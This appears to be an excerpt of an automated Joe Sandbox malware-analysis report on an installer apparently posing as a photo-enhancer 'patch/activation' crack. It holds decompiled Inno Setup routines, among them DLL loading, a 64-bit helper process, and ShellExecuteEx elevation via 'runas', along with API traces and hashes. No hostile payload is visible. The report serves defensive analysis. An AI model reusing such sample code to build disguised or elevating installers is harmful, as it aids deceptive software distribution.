						 *0x49c590 = LoadLibraryA("CTL3D32.DLL");
						_t1 = SetErrorMode(_t27 & 0x0000ffff);
					}
				}
				if( *0x49c590 < 0x20) {
					 *0x49c590 = 1;
				}
				if( *0x49c590 < 0x20) {
					goto L10;
				} else {
					_t2 =  *0x49c590; // 0x1
					 *0x49e634 = GetProcAddress(_t2, "Ctl3dRegister");
					_t4 =  *0x49e014; // 0x400000
					_push(_t4);
					if( *0x49e634() == 0) {
						_t6 =  *0x49c590; // 0x1
						_t7 = FreeLibrary(_t6);
						 *0x49c590 = 1;
						return _t7;
					}
					_t8 =  *0x49c590; // 0x1
					 *0x49e638 = GetProcAddress(_t8, "Ctl3dUnregister");
					_t10 =  *0x49c590; // 0x1
					 *0x49e63c = GetProcAddress(_t10, "Ctl3dSubclassCtl");
					_t12 =  *0x49c590; // 0x1
					 *0x49e640 = GetProcAddress(_t12, "Ctl3dSubclassDlgEx");
					_t14 =  *0x49c590; // 0x1
					 *0x49c56c = GetProcAddress(_t14, "Ctl3dDlgFramePaint");
					_t16 =  *0x49c590; // 0x1
					 *0x49c570 = GetProcAddress(_t16, "Ctl3dCtlColorEx");
					_t18 =  *0x49c590; // 0x1
					 *0x49e644 = GetProcAddress(_t18, "Ctl3dAutoSubclass");
					_t20 =  *0x49c590; // 0x1
					 *0x49e648 = GetProcAddress(_t20, "Ctl3dUnAutoSubclass");
					_t22 =  *0x49c590; // 0x1
					 *0x49e64c = GetProcAddress(_t22, "Ctl3DColorChange");
					_t24 =  *0x49c590; // 0x1
					_t25 = GetProcAddress(_t24, "BtnWndProc3d");
					 *0x49c568 = _t25;
					return _t25;
				}
			}

0x0041f5b0
0x0041f70f
0x0041f70f
0x0041f70f
0x0041f5b6
0x0041f5bb
0x0041f5c0
0x0041f5c4
0x0041f5cb
0x0041f5d2
0x0041f5e3
0x0041f5ec
0x0041f5ec
0x0041f5cb
0x0041f5f8
0x0041f5fa
0x0041f5fa
0x0041f60b
0x00000000
0x0041f611
0x0041f616
0x0041f621
0x0041f626
0x0041f62b
0x0041f634
0x0041f6f9
0x0041f6ff
0x0041f704
0x00000000
0x0041f704
0x0041f63f
0x0041f64a
0x0041f654
0x0041f65f
0x0041f669
0x0041f674
0x0041f67e
0x0041f689
0x0041f693
0x0041f69e
0x0041f6a8
0x0041f6b3
0x0041f6bd
0x0041f6c8
0x0041f6d2
0x0041f6dd
0x0041f6e7
0x0041f6ed
0x0041f6f2
0x00000000
0x0041f6f2

APIs

GetVersion.KERNEL32(?,00419480,00000000,?,?,00000001,00000000), ref: 0041F5B6
SetErrorMode.KERNEL32(00008000,?,00419480,00000000,?,?,00000001,00000000), ref: 0041F5D2
LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419480,00000000,?,?,00000001,00000000), ref: 0041F5DE
SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419480,00000000,?,?,00000001,00000000), ref: 0041F5EC
GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F61C
GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F645
GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F65A
GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F66F
GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F684
GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F699
GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F6AE
GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F6C3
GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F6D8
GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F6ED
FreeLibrary.KERNEL32(00000001,?,00419480,00000000,?,?,00000001,00000000), ref: 0041F6FF

Strings

Ctl3dAutoSubclass, xrefs: 0041F6A3
Ctl3DColorChange, xrefs: 0041F6CD
Ctl3dSubclassCtl, xrefs: 0041F64F
CTL3D32.DLL, xrefs: 0041F5D9
Ctl3dCtlColorEx, xrefs: 0041F68E
Ctl3dRegister, xrefs: 0041F611
Ctl3dUnAutoSubclass, xrefs: 0041F6B8
Ctl3dUnregister, xrefs: 0041F63A
Ctl3dDlgFramePaint, xrefs: 0041F679
Ctl3dSubclassDlgEx, xrefs: 0041F664
BtnWndProc3d, xrefs: 0041F6E2

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
API String ID: 2323315520-3614243559
Opcode ID: c51b297d15a34758f67338d1e7d49e4cbf326938f22b25fc299cd5726b63f8a9
Instruction ID: ada4b9d978a757ba6954df3af716d105719faea7ce3d9b9d26d7a4626bcf7c8a
Opcode Fuzzy Hash: c51b297d15a34758f67338d1e7d49e4cbf326938f22b25fc299cd5726b63f8a9
Instruction Fuzzy Hash: 093112B1600610BBD710EBB1ACC6A653294F76C724795097BF144D71A2E77CA84A8F1C

Uniqueness

Uniqueness Score: -1.00%

Function 00458E58 Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 186
pipeprocessfileCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00458E58(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v12;
				char _v16;
				void* _v20;
				void* _v24;
				long _v28;
				struct _STARTUPINFOA _v96;
				struct _PROCESS_INFORMATION _v112;
				char _v116;
				long _v120;
				char _v124;
				long _v128;
				char _v132;
				intOrPtr _v136;
				char _v140;
				intOrPtr _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				void* _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				int _t82;
				CHAR* _t90;
				CHAR* _t96;
				intOrPtr _t97;
				int _t99;
				void* _t126;
				intOrPtr _t139;
				struct _FILETIME* _t141;
				void* _t145;
				void* _t146;
				intOrPtr _t147;

				_t145 = _t146;
				_t147 = _t146 + 0xffffff4c;
				_v156 = 0;
				_v160 = 0;
				_v16 = 0;
				_t126 = __eax;
				_t141 =  &_v12;
				_push(_t145);
				_push(0x459152);
				_push( *[fs:eax]);
				 *[fs:eax] = _t147;
				E004585A0("Starting 64-bit helper process.", __eax, __ecx, _t141, 0x49f040);
				_t149 =  *0x49f446;
				if( *0x49f446 == 0) {
					E00453B40("Cannot utilize 64-bit features on this version of Windows", _t126, _t141, 0x49f040, _t149);
				}
				_t150 =  *0x49f03c;
				if( *0x49f03c == 0) {
					E00453B40("64-bit helper EXE wasn\'t extracted", _t126, _t141, 0x49f040, _t150);
				}
				while(1) {
					 *0x49f040 =  *0x49f040 + 1;
					 *((intOrPtr*)(_t126 + 0x14)) = GetTickCount();
					if(QueryPerformanceCounter(_t141) == 0) {
						GetSystemTimeAsFileTime(_t141);
					}
					_v152 = GetCurrentProcessId();
					_v148 = 0;
					_v144 =  *0x49f040;
					_v140 = 0;
					_v136 =  *((intOrPtr*)(_t126 + 0x14));
					_v132 = 0;
					_v128 = _t141->dwHighDateTime;
					_v124 = 0;
					_v120 = _t141->dwLowDateTime;
					_v116 = 0;
					E00407D84("\\\\.\\pipe\\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x", 4,  &_v152,  &_v16);
					_v20 = CreateNamedPipeA(E00403738(_v16), 0x40080003, 6, 1, 0x2000, 0x2000, 0, 0);
					if(_v20 != 0xffffffff) {
						break;
					}
					if(GetLastError() != 0xe7) {
						E00453C98("CreateNamedPipe");
					}
				}
				_push(_t145);
				_push(0x45910e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t147;
				_v24 = CreateFileA(E00403738(_v16), 0xc0000000, 0, 0x49cb28, 3, 0, 0);
				__eflags = _v24 - 0xffffffff;
				if(_v24 == 0xffffffff) {
					E00453C98("CreateFile");
				}
				_push(_t145);
				_push(0x4590fd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t147;
				_v28 = 2;
				_t82 = SetNamedPipeHandleState(_v24,  &_v28, 0, 0);
				__eflags = _t82;
				if(_t82 == 0) {
					E00453C98("SetNamedPipeHandleState");
				}
				E00402934( &_v96, 0x44);
				_v96.cb = 0x44;
				E0042DD54( &_v156);
				_t90 = E00403738(_v156);
				_v176 = 0x69;
				_v172 = 0;
				_v168 = _v24;
				_v164 = 0;
				E00407D84("helper %d 0x%x", 1,  &_v176,  &_v160);
				_t96 = E00403738(_v160);
				_t97 =  *0x49f03c; // 0x2311370
				_t99 = CreateProcessA(E00403738(_t97), _t96, 0, 0, 1, 0xc000000, 0, _t90,  &_v96,  &_v112);
				__eflags = _t99;
				if(_t99 == 0) {
					E00453C98("CreateProcess");
				}
				 *((char*)(_t126 + 4)) = 1;
				 *((char*)(_t126 + 5)) = 0;
				 *(_t126 + 8) = _v112.hProcess;
				 *((intOrPtr*)(_t126 + 0x10)) = _v112.dwProcessId;
				 *((intOrPtr*)(_t126 + 0xc)) = _v20;
				_v20 = 0;
				CloseHandle(_v112.hThread);
				_v184 =  *((intOrPtr*)(_t126 + 0x10));
				_v180 = 0;
				E004587AC("Helper process PID: %u", _t126, 0,  &_v184, _t141, 0x49f040);
				__eflags = 0;
				_pop(_t139);
				 *[fs:eax] = _t139;
				_push(E00459104);
				return CloseHandle(_v24);
			}

0x00458e59
0x00458e5b
0x00458e66
0x00458e6c
0x00458e72
0x00458e75
0x00458e7c
0x00458e81
0x00458e82
0x00458e87
0x00458e8a
0x00458e92
0x00458e97
0x00458e9e
0x00458ea5
0x00458ea5
0x00458eaa
0x00458eb1
0x00458eb8
0x00458eb8
0x00458ebd
0x00458ebd
0x00458ec4
0x00458ecf
0x00458ed2
0x00458ed2
0x00458ee0
0x00458ee6
0x00458eef
0x00458ef5
0x00458eff
0x00458f05
0x00458f0c
0x00458f0f
0x00458f15
0x00458f18
0x00458f2c
0x00458f56
0x00458f5d
0x00000000
0x00000000
0x00458f69
0x00458f74
0x00458f74
0x00458f69
0x00458f80
0x00458f81
0x00458f86
0x00458f89
0x00458fac
0x00458faf
0x00458fb3
0x00458fba
0x00458fba
0x00458fc1
0x00458fc2
0x00458fc7
0x00458fca
0x00458fcd
0x00458fe0
0x00458fe5
0x00458fe7
0x00458fee
0x00458fee
0x00458ffd
0x00459002
0x00459017
0x00459022
0x0045903c
0x00459046
0x00459050
0x00459056
0x0045906d
0x00459078
0x0045907e
0x00459089
0x0045908e
0x00459090
0x00459097
0x00459097
0x0045909c
0x004590a0
0x004590a7
0x004590ad
0x004590b3
0x004590b8
0x004590bf
0x004590c7
0x004590cd
0x004590e1
0x004590e6
0x004590e8
0x004590eb
0x004590ee
0x004590fc

APIs

GetTickCount.KERNEL32 ref: 00458EBF
QueryPerformanceCounter.KERNEL32(0225386C,00000000,00459152,?,?,0225386C,00000000,?,0045984E,?,0225386C,00000000), ref: 00458EC8
GetSystemTimeAsFileTime.KERNEL32(0225386C,0225386C), ref: 00458ED2
GetCurrentProcessId.KERNEL32(?,0225386C,00000000,00459152,?,?,0225386C,00000000,?,0045984E,?,0225386C,00000000), ref: 00458EDB
CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00458F51
GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,0225386C,0225386C), ref: 00458F5F
CreateFileA.KERNEL32(00000000,C0000000,00000000,0049CB28,00000003,00000000,00000000,00000000,0045910E), ref: 00458FA7
SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,004590FD,?,00000000,C0000000,00000000,0049CB28,00000003,00000000,00000000,00000000,0045910E), ref: 00458FE0

Part of subcall function 0042DD54: GetSystemDirectoryA.KERNEL32 ref: 0042DD67

CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00459089
CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 004590BF
CloseHandle.KERNEL32(000000FF,00459104,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004590F7

Part of subcall function 00453C98: GetLastError.KERNEL32(00000000,0045482D,00000005,00000000,00454862,?,?,00000000,0049E62C,00000004,00000000,00000000,00000000,?,0049B229,00000000), ref: 00453C9B

Strings

Cannot utilize 64-bit features on this version of Windows, xrefs: 00458EA0
CreateNamedPipe, xrefs: 00458F6F
SetNamedPipeHandleState, xrefs: 00458FE9
Starting 64-bit helper process., xrefs: 00458E8D
helper %d 0x%x, xrefs: 00459068
64-bit helper EXE wasn't extracted, xrefs: 00458EB3
Helper process PID: %u, xrefs: 004590DC
D, xrefs: 00459002
CreateFile, xrefs: 00458FB5
i, xrefs: 0045903C
CreateProcess, xrefs: 00459092
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x, xrefs: 00458F27

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
API String ID: 770386003-3271284199
Opcode ID: b375d96397c6632667d164baec73f65624ff5ffc3f1fcf3f9de5ecf71cc0254d
Instruction ID: 040c0b68ca5c8794fa0f134b015e2131507262e67e069d6a1689acc5a442bbd1
Opcode Fuzzy Hash: b375d96397c6632667d164baec73f65624ff5ffc3f1fcf3f9de5ecf71cc0254d
Instruction Fuzzy Hash: 9C710170A00754AEDB11DF65CC45B9EB7F8AB05705F1084AAF908FB282DB785944CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0047A678 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0047A678(void* __eax, void* __ebx, DWORD* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				DWORD* _v8;
				char _v12;
				char _v16;
				void* _v20;
				long _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v72;
				char _v76;
				char* _t37;
				long _t40;
				intOrPtr _t69;
				void* _t72;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t70 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xffffffb8;
				_push(__edi);
				_v12 = 0;
				_v16 = 0;
				_v8 = __ecx;
				_t72 = __edx;
				_t60 = __eax;
				_push(_t74);
				_push(0x47a7c6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				E0047A4E4(__eax, __ecx,  &_v12);
				E0047A5BC( &_v16, _t60, __edi, _t72);
				E00402934( &_v76, 0x3c);
				_v76 = 0x3c;
				_v72 = 0x800540;
				_v64 = 0x47a7d4;
				_v60 = E00403738(_v12);
				_v56 = E00403738(_t72);
				_v52 = E00403738(_v16);
				_v48 = 1;
				_t37 =  &_v76;
				_push(_t37);
				L0042D134();
				if(_t37 == 0) {
					if(GetLastError() == 0x4c7) {
						E00409070();
					}
					E00453C98("ShellExecuteEx");
				}
				_t80 = _v20;
				if(_v20 == 0) {
					E00453B40("ShellExecuteEx returned hProcess=0", _t60, _t70, _t72, _t80);
				}
				_push(_t74);
				_push(0x47a7a4);
				_push( *[fs:edx]);
				 *[fs:edx] = _t76;
				do {
					E0047A204();
					_t40 = MsgWaitForMultipleObjects(1,  &_v20, 0, 0xffffffff, 0xff);
				} while (_t40 == 1);
				if(_t40 + 1 == 0) {
					E00453C98("MsgWaitForMultipleObjects");
				}
				E0047A204();
				if(GetExitCodeProcess(_v20, _v8) == 0) {
					E00453C98("GetExitCodeProcess");
				}
				_pop(_t69);
				 *[fs:eax] = _t69;
				_push(E0047A7AB);
				return CloseHandle(_v20);
			}

0x0047a678
0x0047a679
0x0047a67b
0x0047a680
0x0047a683
0x0047a686
0x0047a689
0x0047a68c
0x0047a68e
0x0047a692
0x0047a693
0x0047a698
0x0047a69b
0x0047a6a3
0x0047a6ab
0x0047a6ba
0x0047a6bf
0x0047a6c6
0x0047a6d2
0x0047a6dd
0x0047a6e7
0x0047a6f2
0x0047a6f5
0x0047a6fc
0x0047a6ff
0x0047a700
0x0047a707
0x0047a713
0x0047a715
0x0047a715
0x0047a71f
0x0047a71f
0x0047a724
0x0047a728
0x0047a72f
0x0047a72f
0x0047a736
0x0047a737
0x0047a73c
0x0047a73f
0x0047a742
0x0047a742
0x0047a756
0x0047a75b
0x0047a761
0x0047a768
0x0047a768
0x0047a76d
0x0047a781
0x0047a788
0x0047a788
0x0047a78f
0x0047a792
0x0047a795
0x0047a7a3

APIs

Part of subcall function 0047A4E4: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02252CC8,?,?,?,02252CC8,0047A6A8,00000000,0047A7C6,?,?,?,?), ref: 0047A4FD
Part of subcall function 0047A4E4: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047A503
Part of subcall function 0047A4E4: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02252CC8,?,?,?,02252CC8,0047A6A8,00000000,0047A7C6,?,?,?,?), ref: 0047A516
Part of subcall function 0047A4E4: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02252CC8,?,?,?,02252CC8), ref: 0047A540
Part of subcall function 0047A4E4: CloseHandle.KERNEL32(00000000,?,?,?,02252CC8,0047A6A8,00000000,0047A7C6,?,?,?,?), ref: 0047A55E

Part of subcall function 0047A5BC: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,0047A64E,?,?,?,02252CC8,?,0047A6B0,00000000,0047A7C6,?,?,?,?), ref: 0047A5EC

ShellExecuteEx.SHELL32(0000003C), ref: 0047A700
GetLastError.KERNEL32(00000000,0047A7C6,?,?,?,?), ref: 0047A709
MsgWaitForMultipleObjects.USER32 ref: 0047A756
GetExitCodeProcess.KERNEL32 ref: 0047A77A
CloseHandle.KERNEL32(00000000,0047A7AB,00000000,00000000,000000FF,000000FF,00000000,0047A7A4,?,00000000,0047A7C6,?,?,?,?), ref: 0047A79E

Strings

MsgWaitForMultipleObjects, xrefs: 0047A763
<, xrefs: 0047A6BF
GetExitCodeProcess, xrefs: 0047A783
ShellExecuteEx returned hProcess=0, xrefs: 0047A72A
runas, xrefs: 0047A6CD
ShellExecuteEx, xrefs: 0047A71A

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
API String ID: 883996979-221126205
Opcode ID: 58d1bfba5840bad948c2963b7d5ad4a4cbc1477af2dcba1bc699b1f368994b23
Instruction ID: 0d6525aa7dba4a670bafe224496e1c5a7b1f34ed0ce7a0cdec9df710ef63790c
Opcode Fuzzy Hash: 58d1bfba5840bad948c2963b7d5ad4a4cbc1477af2dcba1bc699b1f368994b23
Instruction Fuzzy Hash: 15315871900204AFDB15EFA5C842ADEB7B8EF84318F50843BF518E7282D77C99158B5A

Uniqueness

Uniqueness Score: -1.00%

Function 00418814 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418814(void* __eax) {
				struct _WINDOWPLACEMENT _v56;
				struct tagPOINT _v64;
				intOrPtr _v68;
				intOrPtr _t33;
				void* _t43;
				struct HWND__* _t49;
				struct tagPOINT* _t51;

				_t51 =  &(_v64.y);
				_t43 = __eax;
				if(IsIconic( *(__eax + 0xc0)) == 0) {
					GetWindowRect( *(_t43 + 0xc0), _t51);
				} else {
					_v56.length = 0x2c;
					GetWindowPlacement( *(_t43 + 0xc0),  &_v56);
					memcpy(_t51,  &(_v56.rcNormalPosition), 4 << 2);
					_t51 = _t51 + 0xc;
				}
				if((GetWindowLongA( *(_t43 + 0xc0), 0xfffffff0) & 0x40000000) != 0) {
					_t49 = GetWindowLongA( *(_t43 + 0xc0), 0xfffffff8);
					ScreenToClient(_t49, _t51);
					ScreenToClient(_t49,  &_v64);
				}
				 *(_t43 + 0x24) = _t51->x;
				 *((intOrPtr*)(_t43 + 0x28)) = _v68;
				 *((intOrPtr*)(_t43 + 0x2c)) = _v64.x - _t51->x;
				_t33 = _v64.y.x - _v68;
				 *((intOrPtr*)(_t43 + 0x30)) = _t33;
				return _t33;
			}

0x00418817
0x0041881a
0x0041882a
0x0041885c
0x0041882c
0x0041882c
0x00418840
0x00418850
0x00418850
0x00418850
0x00418874
0x00418884
0x00418888
0x00418893
0x00418893
0x0041889b
0x004188a2
0x004188ac
0x004188b3
0x004188b7
0x004188c0

APIs

IsIconic.USER32 ref: 00418823
GetWindowPlacement.USER32(?,0000002C), ref: 00418840
GetWindowRect.USER32 ref: 0041885C
GetWindowLongA.USER32 ref: 0041886A
GetWindowLongA.USER32 ref: 0041887F
ScreenToClient.USER32 ref: 00418888
ScreenToClient.USER32 ref: 00418893

Strings

,, xrefs: 0041882C

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Window$ClientLongScreen$IconicPlacementRect
String ID: ,
API String ID: 2266315723-3772416878
Opcode ID: dac5a07ef4df856ef257039b4bd7ee432e64e833f517036103e80ee43864890f
Instruction ID: 4677e2b8f0f91e01fbb11cd2367981c379ed87121ba2a99f8ef1be567d42c28b
Opcode Fuzzy Hash: dac5a07ef4df856ef257039b4bd7ee432e64e833f517036103e80ee43864890f
Instruction Fuzzy Hash: 5A11E971505201AFDB00EF69C885F9B77E8AF49314F140A7EB958DB296D738D900CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0042F75C Relevance: 13.6, APIs: 9, Instructions: 108
windowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0042F75C(CHAR* __eax, void* __ebx, signed int __ecx, CHAR* __edx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct HWND__* _v16;
				intOrPtr _v20;
				char _v21;
				char _v40;
				intOrPtr _t28;
				intOrPtr _t43;
				intOrPtr _t46;
				intOrPtr _t58;
				CHAR* _t67;
				intOrPtr _t76;
				intOrPtr _t78;
				void* _t79;
				CHAR* _t81;
				void* _t83;
				void* _t84;
				intOrPtr _t85;

				_t79 = __edi;
				_t83 = _t84;
				_t85 = _t84 + 0xffffffdc;
				_push(__ebx);
				_push(__esi);
				_v8 = __ecx;
				_t81 = __edx;
				_t67 = __eax;
				if( *0x49e68c != 0) {
					_v8 = _v8 | 0x00180000;
				}
				_t28 =  *0x49e62c; // 0x2252410
				if(IsIconic( *(_t28 + 0x20)) != 0) {
					L5:
					_v16 = GetActiveWindow();
					_v20 = E0041F334(0, _t67, _t79, _t81);
					_push(_t83);
					_push(0x42f80c);
					_push( *[fs:eax]);
					 *[fs:eax] = _t85;
					_v12 = MessageBoxA(0, _t67, _t81, _v8 | 0x00002000);
					_pop(_t76);
					 *[fs:eax] = _t76;
					_push(E0042F915);
					E0041F3E8(_v20);
					return SetActiveWindow(_v16);
				} else {
					_t43 =  *0x49e62c; // 0x2252410
					if((GetWindowLongA( *(_t43 + 0x20), 0xfffffff0) & 0x10000000) == 0) {
						goto L5;
					} else {
						_t46 =  *0x49e62c; // 0x2252410
						if((GetWindowLongA( *(_t46 + 0x20), 0xffffffec) & 0x00000080) == 0) {
							E0042F600();
							_push(_t83);
							_push(0x42f90e);
							_push( *[fs:ecx]);
							 *[fs:ecx] = _t85;
							_v21 = E0042F654( &_v40);
							_push(_t83);
							_push(0x42f8ef);
							_push( *[fs:ecx]);
							 *[fs:ecx] = _t85;
							_v16 = GetActiveWindow();
							_v20 = E0041F334(0, _t67, _t79, _t81);
							_push(_t83);
							_push(0x42f89a);
							_push( *[fs:eax]);
							 *[fs:eax] = _t85;
							_t58 =  *0x49e62c; // 0x2252410
							_v12 = MessageBoxA( *(_t58 + 0x20), _t67, _t81, _v8);
							_pop(_t78);
							 *[fs:eax] = _t78;
							_push(E0042F8A1);
							E0041F3E8(_v20);
							return SetActiveWindow(_v16);
						} else {
							goto L5;
						}
					}
				}
			}

0x0042f75c
0x0042f75d
0x0042f75f
0x0042f762
0x0042f763
0x0042f764
0x0042f767
0x0042f769
0x0042f772
0x0042f774
0x0042f774
0x0042f77b
0x0042f78b
0x0042f7b8
0x0042f7bd
0x0042f7c7
0x0042f7cc
0x0042f7cd
0x0042f7d2
0x0042f7d5
0x0042f7ea
0x0042f7ef
0x0042f7f2
0x0042f7f5
0x0042f7fd
0x0042f80b
0x0042f78d
0x0042f78f
0x0042f7a2
0x00000000
0x0042f7a4
0x0042f7a6
0x0042f7b6
0x0042f818
0x0042f81f
0x0042f820
0x0042f825
0x0042f828
0x0042f833
0x0042f838
0x0042f839
0x0042f83e
0x0042f841
0x0042f849
0x0042f853
0x0042f858
0x0042f859
0x0042f85e
0x0042f861
0x0042f86a
0x0042f878
0x0042f87d
0x0042f880
0x0042f883
0x0042f88b
0x0042f899
0x00000000
0x00000000
0x00000000
0x0042f7b6
0x0042f7a2

APIs

IsIconic.USER32 ref: 0042F784
GetWindowLongA.USER32 ref: 0042F798
GetWindowLongA.USER32 ref: 0042F7AF
GetActiveWindow.USER32 ref: 0042F7B8
MessageBoxA.USER32 ref: 0042F7E5
SetActiveWindow.USER32(?,0042F915,00000000,00000000,0042F80C,?,?,00000000,?), ref: 0042F806

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

